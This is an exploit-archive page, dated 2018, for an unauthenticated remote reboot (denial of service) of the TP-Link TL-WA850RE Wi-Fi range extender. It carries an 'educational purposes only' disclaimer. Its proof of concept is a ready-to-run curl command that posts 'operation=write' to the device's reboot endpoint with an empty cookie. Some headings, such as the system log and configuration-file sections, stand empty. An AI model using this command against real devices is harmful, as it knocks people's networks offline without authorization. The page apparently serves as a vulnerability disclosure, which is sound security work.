Tplink technologies tlwa850re wifi range extender remote reboot Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-04-26 | Type : webapps | Platform : hardware
This exploit / vulnerability Tplink technologies tlwa850re wifi range extender remote reboot is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Date: 25/04/2018
# Exploit Author: Wadeek
# Vendor Homepage:
# Firmware Link:
# Category: dos

1. (with title "Opening...")

"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="

2. Proof of Concept

:System Log:

:Encrypted Configuration File:

curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'